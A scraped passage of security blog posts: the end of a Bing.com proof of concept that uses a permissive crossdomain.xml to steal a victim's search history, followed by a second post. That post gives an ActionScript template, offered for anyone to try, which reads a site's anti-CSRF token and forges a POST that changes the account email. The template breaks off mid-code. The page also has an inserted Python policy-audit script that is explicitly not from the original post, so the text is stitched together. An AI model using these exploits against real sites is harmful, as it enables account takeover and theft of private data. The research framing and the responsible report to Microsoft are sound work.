<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="201" src="https://lh5.googleusercontent.com/dA2PbQdijjEtGFqKq6T0uIxp3D9qnU244RGm0NZnrGy1uYrR1sYpgrrXTgu-SyqB4LHWIlAGHDp0mndRmPT5dThWjoX_2kqVbfECKYMb5AaXRk637adGxsyHsQcfYE30x6mYD00saIw" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 6: </span></span>Because of the overly permissive crossdomain.xml file, the SWF is able to bypass the Same-Origin Policy and record the server response to the previous request. The SWF sends the data retrieved from <a href="https://www.bing.com/profile/history">https://www.bing.com/profile/history</a> to the attacker's data drop page:</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><img height="377" src="https://lh5.googleusercontent.com/aTsmPvjb_IU_UBx4O9aORkUXY0XNn6edHNk6lwG0SqX9Lsa2JS29nWUX5dQIqUqGNPB2e_ux5-pXEvcYxVopGyc11SUa9Mj0wv5QmcsDJYgrAZL3cF-skvS_Xdgp4wbn3H-NWaCaaWY" style="-webkit-transform: rotate(0rad); border: currentColor;" width="604" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: inherit;">At this point, the exploitation is over from the perspective of the victim. Let's switch to the attacker's perspective, and look at the stolen data. </span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: inherit;"><br /></span></span>
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here is the data collector script on the attacker's server:</span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://lh4.googleusercontent.com/2AgQLUYxuIelkKOZMKXjb2f9IgbVSj875JUvuEQ9oK-44BY_Jfe3jwS9DTJ2SDuqsTMeDbyuJPDuSSJCc7Dhl5i3j2UvXKcnYezbpNRdgkqZacqdiecQ02NUkaezAU4ZICjCG2kHOhE" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://lh4.googleusercontent.com/2AgQLUYxuIelkKOZMKXjb2f9IgbVSj875JUvuEQ9oK-44BY_Jfe3jwS9DTJ2SDuqsTMeDbyuJPDuSSJCc7Dhl5i3j2UvXKcnYezbpNRdgkqZacqdiecQ02NUkaezAU4ZICjCG2kHOhE" style="-webkit-transform: rotate(0rad); border: currentColor;" width="541" /></a></div>
<span style="line-height: 1; white-space: pre-wrap;">As I mentioned in my previous post, this PHP file takes the entire data portion of the incoming HTTP message and writes it to a file in /tmp.</span> You can get a lot fancier with this, such as creating a separate file per victim, or parsing the data within PHP and writing only the relevant information to disk, but this was sufficient for the POC that I sent to Microsoft.</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span><br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 7:</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> The attacker can now parse the stolen data. The command below just parses the search queries out of the source code of the stolen page. What is shown is basically the last 10 or so things I searched for on my Microsoft Surface.</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">root@kali:/var/www# <span style="color: red;">cat /tmp/bing.txt | xmllint --format - | grep "sh_item_qu_query"</span></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="168" src="https://lh3.googleusercontent.com/6RbWfU6BUTwS4uOmhouNjc29v5-6CqDIR9G4c6DBTY5I_OqpBzCkmyuv_qi_q43yinIfOZINvJxIye866D9z-ey6q1Dk5MaFZAn0NhzEDE_lDF2HVdV9O4O0LASbR5Ys9ZotqaWO0E0" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;">This next command does the same thing, but it extracts the URLs that I visited as a result of my Bing searches:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "courier new" , "courier" , monospace;">root@kali:/var/www# <span style="color: red;">cat /tmp/bing.txt | xmllint --format - | grep "sh_item_cl_url"</span></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="206" src="https://lh5.googleusercontent.com/X0K0ZkTfZfaILS35kvd6FDhxh3UbcY9TdnEeBatkfz_cmqM-uvBhTGQGxdoSkSd2kUs9IhClBaCS8AQuaogwy5LEuFnKScDvq9pAXgSABnULnf59os1ZlsiaLIGnpqyBqFINmWWPLUo" style="-webkit-transform: rotate(0rad); border: currentColor;" width="580" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is where I stopped, but the </span></span><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">POC can be extended to include the user's entire search history by using the </span><a href="https://www.bing.com/profile/history/more" style="font-family: inherit; line-height: 1; text-decoration: none;"><span style="text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bing.com/profile/history/more</span></a><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;"> page. In the screenshot below, the t parameter is a timestamp that can be iterated. You can see that by modifying the timestamp, I was able to pull up things I searched for back in December 2012</span><span style="font-family: inherit; line-height: 1; white-space: pre-wrap;">:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><img height="289" src="https://lh6.googleusercontent.com/-JRKoTbMaT7F7jKmV4nmTXo2QikI8xhhhOBtclRdDzFXiNxBjdHdHN22S9zU-C0sTnJ0RuqRBPMxMWD_hpQSplV_5VnVWFjv291GuLRaRn4zcKDHKgOohtB8EFqpeF4LXFztJngf7sc" style="-webkit-transform: rotate(0.00rad); border: currentColor; transform: rotate(0rad);" width="499" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span><br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red; line-height: 16px; white-space: pre-wrap;">The malicious SWF could have easily made multiple requests, walking back the timestamp each time, essentially downloading everything the victim has ever searched for on Bing.com. </span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: inherit;"> </span></span><br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="line-height: 1; white-space: pre-wrap;">Here is the ActionScript source (BingExternal.as) that, once compiled, becomes BingExternal.SWF:</span><br />
<div class="separator" style="clear: both;">
<br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><img height="595" src="https://lh6.googleusercontent.com/WglhVj3lqEBoaxv05r0KRZ6bv9r8eLT5FUdnL6hDWm7Bd-6QFXeSi0evQILaD6F4E0r8Vf3QZ0dMM6TYhf1RuvMveckVjsz-EZmq_6ZP-6u_qA-XJ6j74BwMXetL_j9e61DLX7kpyYA" style="-webkit-transform: rotate(0rad); border: currentColor;" width="559" /></span><br />
<span style="font-family: inherit;"><br /></span></div>
</div>
<span style="color: black; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<div style="line-height: normal;">
<span style="color: black; font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">If you look closely at the very first picture in the POC, you will notice that the victim was viewing https://ssl.bing.com/profile/history. You should also notice that the exploit SWF requests the sensitive data from https://www.bing.com/profile/history. This is where I got lucky. </span></div>
<div style="line-height: normal;">
</div>
<div style="line-height: normal;">
I *think* the developers made the following assumptions: </div>
<div style="line-height: normal;">
<ul>
<li>When a user is authenticated, we send them to ssl.bing.com, and that crossdomain.xml does not exist, so all is good. </li>
<li>When a user is unauthenticated, we send them to <a href="http://www.bing.com/">www.bing.com</a>. Even though we have a very permissive crossdomain.xml, only unauthenticated users will use this part of the site, so no sensitive information can be stolen via Flash. </li>
</ul>
</div>
So really, I was only able to exploit the overly permissive crossdomain.xml file and gain access to the sensitive information because the application sent the sensitive history information to authenticated users even when they requested the data from <a href="http://www.bing.com/profile/history">www.bing.com/profile/history</a>. If Bing had told authenticated users to use ssl.bing.com/profile/history or get lost, I would not have had a very exciting demo. <br />
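As an added example (not code from the original post), here is a small Python model of the policy decision described in Step 4 and in the root-cause discussion above: which SWF origins a given crossdomain.xml admits, and which attributes an auditor should flag. The two policy files are constructed samples, not Bing's actual files, and the third-party hostname is a placeholder.

```python
# Added example: a model of how Adobe Flash Player evaluated a crossdomain.xml
# policy, plus an audit of the attributes that make a policy dangerous.
# The two policies below are constructed samples, not Bing's real files.
import xml.etree.ElementTree as ET

# Constructed: the shape of a wide-open master policy.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>"""

# Constructed: a restricted policy that trusts only first-party hosts over TLS.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="*.bing.com" secure="true"/>
</cross-domain-policy>"""


def domain_matches(pattern: str, host: str) -> bool:
    """Flash domain matching: "*" is any host; "*.example.com" is example.com
    and every subdomain of it; anything else must match exactly."""
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        base = pattern[2:]
        return host == base or host.endswith("." + base)
    return host == pattern


def swf_may_read(policy_xml: str, swf_host: str, swf_https: bool,
                 target_https: bool) -> bool:
    """True if a SWF served from swf_host may read responses from the host that
    publishes this policy.  secure defaults to "true", so an HTTPS target
    refuses HTTP-served SWFs unless a rule explicitly says secure="false"."""
    root = ET.fromstring(policy_xml)
    for rule in root.findall("allow-access-from"):
        if not domain_matches(rule.get("domain", ""), swf_host):
            continue
        secure = rule.get("secure", "true").lower() != "false"
        if target_https and secure and not swf_https:
            continue  # this rule only admits SWFs that were loaded over HTTPS
        return True
    return False


def audit_policy(policy_xml: str) -> list:
    """Return the findings a defender should raise for this policy file."""
    findings = []
    root = ET.fromstring(policy_xml)
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('domain="*": a SWF on any site can read responses as the victim')
        elif domain.startswith("*."):
            findings.append(f'domain="{domain}": every matching subdomain is trusted')
        if rule.get("secure", "true").lower() == "false":
            findings.append(f'secure="false" on "{domain}": HTTP-served SWFs may read HTTPS responses')
    for rule in root.findall("allow-http-request-headers-from"):
        if rule.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*": any site may send custom headers')
    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies") == "all":
        findings.append('permitted-cross-domain-policies="all": any file on the host may act as a policy')
    return findings


if __name__ == "__main__":
    # The post's scenario: a SWF hosted on a third-party site (placeholder name)
    # reading from an HTTPS target.  The permissive policy admits it; the
    # restricted policy does not.
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("restricted", RESTRICTED_POLICY)):
        allowed = swf_may_read(policy, "third-party-site.example", True, True)
        print(f"{name}: third-party SWF may read responses -> {allowed}")
        for finding in audit_policy(policy):
            print("  finding:", finding)
```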
<br />
Questions? Concerns? Leave me a note in the comments! <br />
<h2>
Related Work: </h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html">Exploiting misconfigured crossdomain.xml files</a></li>
<li><a href="http://sethsec.blogspot.com/2014/03/exploiting-insecure-crossdomain.html">Exploiting insecure crossdomain policies to bypass anti-CSRF tokens</a></li>
<li><a href="http://sethsec.blogspot.com/2014/07/crossdomain-bing.html">Real world exploitation of a misconfigured crossdomain.xml - Bing.com</a></li>
<li><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2227.html">AirVision Controller v2.1.3 - Overly Permissive default crossdomain.xml</a></li>
<li><a href="http://sethsec.blogspot.com/2014/10/bsidesdc-2014.html">BSides DC 2014 - SWF Seeking Lazy Admin for Cross-Domain Action</a></li>
</ul>
</div>
</div>
</div>
Seth Art<br />
<h2>Exploiting insecure crossdomain policies to bypass anti-CSRF tokens</h2>
<div>Seth Art, 2014-03-28</div>
In my last post, I mentioned that if a site hosts an insecure crossdomain.xml file, you can exploit that flaw to bypass the same-origin policy and, among other things, read anti-CSRF tokens. Because your Flash object can read the anti-CSRF token, it can extract the token from the response and use it in future requests. In fact, this is almost identical to how you can bypass CSRF tokens with XSS.<br />
<br />
I recently came across a popular website that met these criteria, and I created a POC to send to the security team. The site protected itself against CSRF using anti-CSRF tokens, but they had a wide open crossdomain.xml file. I'll post the details later, but I wanted to drop the template here, in the event anyone wants to give it a try: <br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #008800; font-style: italic;">// Original POC Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)</span>
<span style="color: #008800; font-style: italic;">// Modified to bypass antiCSRF tokens: Seth Art (sethsec@gmail.com)</span>
<span style="color: #008800; font-style: italic;">// </span><span style="color: #00a000;">BypassCSRFchangeEmailAddress</span><span style="color: #008800; font-style: italic; line-height: 125%;">.as</span>
<span style="color: #aa22ff; font-weight: bold;">package</span> <span style="color: #666666;">{</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.display.Sprite</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.events.</span><span style="color: #666666;">*;</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.net.URLRequestMethod</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.net.URLRequest</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">import</span> <span style="color: blue; font-weight: bold;">flash.net.URLLoader</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">public</span> <span style="color: #aa22ff; font-weight: bold;">class</span> BypassCSRFchangeEmailAddress <span style="color: #aa22ff; font-weight: bold;">extends</span> Sprite <span style="color: #666666;">{</span>
<span style="color: #aa22ff; font-weight: bold;">public</span> <span style="color: #aa22ff; font-weight: bold;">function </span><span style="color: #00a000; line-height: 125%;">BypassCSRFchangeEmailAddress</span><span style="color: #666666; line-height: 125%;">()</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">{</span>
<span style="color: #008800; font-style: italic;">// Target URL from where the data is to be retrieved</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> readFrom:<span style="color: #00bb00; font-weight: bold;">String</span> <span style="color: #666666;">=</span> <span style="color: #bb4444;">"https://www.secret-site.com/account/edit"</span><span style="color: #666666;">;</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> readRequest:<span style="color: #00bb00; font-weight: bold;">URLRequest</span> <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> <span style="color: #00bb00; font-weight: bold;">URLRequest</span><span style="color: #666666;">(</span>readFrom<span style="color: #666666;">);</span>
<span style="color: #aa22ff; font-weight: bold;">var</span> getLoader:<span style="color: #00bb00; font-weight: bold;">URLLoader</span> <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> <span style="color: #00bb00; font-weight: bold;">URLLoader</span><span style="color: #666666;">();</span>
getLoader<span style="color: #666666;">.</span><span style="color: #bb4444;">addEventListener</span><span style="color: #666666;">(</span>Event<span style="color: #666666;">.</span><span style="color: #bb4444;">COMPLETE</span><span style="color: #666666;">,</span> eventHandler<span style="color: #666666;">);</span>
<span style="color: #aa22ff; font-weight: bold;">try</span> <span style="color: #666666;">{</span>
getLoader<span style="color: #666666;">.</span><span style="color: #bb4444;">load</span><span style="color: #666666;">(</span>readRequest<span style="color: #666666;">);</span>
<span style="color: #666666;">}</span> <span style="color: #aa22ff; font-weight: bold;">catch</span> <span style="color: #666666;">(</span>error<span style="color: #666666;">:</span>Error<span style="color: #666666;">)</span> <span style="color: #666666;">{</span>
<span style="color: #00a000;">trace</span><span style="color: #666666;">(</span><span style="color: #bb4444;">"Error loading URL: "</span> <span style="color: #666666;">+</span> error<span style="color: #666666;">);</span>
<span style="color: #666666;">}</span>
<span style="color: #666666;">}</span>
<span style="color: #aa22ff; font-weight: bold;">private</span> <span style="color: #aa22ff; font-weight: bold;">function </span><span style="color: #00a000;">eventHandler</span><span style="color: #666666;">(</span>event<span style="color: #666666;">:</span><span style="color: #00bb00; font-weight: bold;">Event</span><span style="color: #666666;">):</span><span style="color: #00bb00; font-weight: bold;">void</span> <span style="color: #666666;">{</span>
<span style="color: #008800; font-style: italic;">// This assigns the response from the first </span></pre>
<pre style="margin: 0px;"><span style="line-height: 125%;"> </span><span style="color: #008800; font-style: italic; line-height: 125%;">// request to "response". </span><span style="color: #008800; font-style: italic; line-height: 125%;">The antiCSRF token is</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// somewhere in this response</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> response:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> event</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">target</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">data</span><span style="color: #666666; line-height: 125%;">;</span><span style="line-height: 125%;">
</span><span style="color: #008800;"><span style="line-height: 125%;"><i>// This line looks for the line in the </i></span><span style="line-height: 16.25px;"><i>response</i></span><span style="line-height: 125%;"><i> </i></span></span></pre>
<pre style="margin: 0px;"><span style="color: #008800;"><span style="line-height: 125%;"><i> // that contains the CSRF token</i></span></span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> CSRF:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">Array</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> response</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">match</span><span style="color: #666666; line-height: 125%;">(/</span><span style="line-height: 125%;">CSRFToken</span><span style="color: #666666; line-height: 125%;">.*/);</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// This line extracts the value of the CSRF token, </span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // and assigns it to "token"</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> token:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> CSRF</span><span style="color: #666666; line-height: 125%;">[0].</span><span style="line-height: 125%;">split</span><span style="color: #666666; line-height: 125%;">(</span><span style="color: #bb4444; line-height: 125%;">"\""</span><span style="color: #666666; line-height: 125%;">)[2];</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// These next two lines create the prefix and the </span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // suffix for the POST request</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> prefix:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #bb4444; line-height: 125%;">"CSRFToken="</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> suffix:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #bb4444; line-height: 125%;">"&first_name=CSRF&last_name=CSRF&email=sethsec%40gmail.com"</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// This section sets up a new URLRequest object and</span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // sets the method to post </span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> sendTo:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">String</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #bb4444; line-height: 125%;">"https://www.secret-site.com/account/edit/"</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> sendRequest:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">URLRequest</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">new</span><span style="line-height: 125%;"> </span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">URLRequest</span><span style="color: #666666; line-height: 125%;">(</span><span style="line-height: 125%;">sendTo</span><span style="color: #666666; line-height: 125%;">);</span><span style="line-height: 125%;">
sendRequest</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">method</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> URLRequestMethod</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">POST</span><span style="color: #666666; line-height: 125%;">;</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// This next line sets the data portion of the POST </span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // request to the "prefix" + "token" + "suffix"</span><span style="line-height: 125%;">
sendRequest</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">data</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> prefix</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">concat</span><span style="color: #666666; line-height: 125%;">(</span><span style="line-height: 125%;">token</span><span style="color: #666666; line-height: 125%;">,</span><span style="line-height: 125%;">suffix</span><span style="color: #666666; line-height: 125%;">)</span><span style="line-height: 125%;">
</span><span style="color: #008800; font-style: italic; line-height: 125%;">// Time to create the URLLoader object and send the </span></pre>
<pre style="margin: 0px;"><span style="color: #008800; font-style: italic; line-height: 125%;"> // POST request containing the CSRF token</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">var</span><span style="line-height: 125%;"> sendLoader:</span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">URLLoader</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">=</span><span style="line-height: 125%;"> </span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">new</span><span style="line-height: 125%;"> </span><span style="color: #00bb00; font-weight: bold; line-height: 125%;">URLLoader</span><span style="color: #666666; line-height: 125%;">();</span><span style="line-height: 125%;">
</span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">try</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">{</span><span style="line-height: 125%;">
sendLoader</span><span style="color: #666666; line-height: 125%;">.</span><span style="color: #bb4444; line-height: 125%;">load</span><span style="color: #666666; line-height: 125%;">(</span><span style="line-height: 125%;">sendRequest</span><span style="color: #666666; line-height: 125%;">);</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span><span style="line-height: 125%;"> </span><span style="color: #aa22ff; font-weight: bold; line-height: 125%;">catch</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">(</span><span style="line-height: 125%;">error</span><span style="color: #666666; line-height: 125%;">:</span><span style="line-height: 125%;">Error</span><span style="color: #666666; line-height: 125%;">)</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">{</span><span style="line-height: 125%;">
</span><span style="color: #00a000; line-height: 125%;">trace</span><span style="color: #666666; line-height: 125%;">(</span><span style="color: #bb4444; line-height: 125%;">"Error loading URL: "</span><span style="line-height: 125%;"> </span><span style="color: #666666; line-height: 125%;">+</span><span style="line-height: 125%;"> error</span><span style="color: #666666; line-height: 125%;">);</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span><span style="line-height: 125%;">
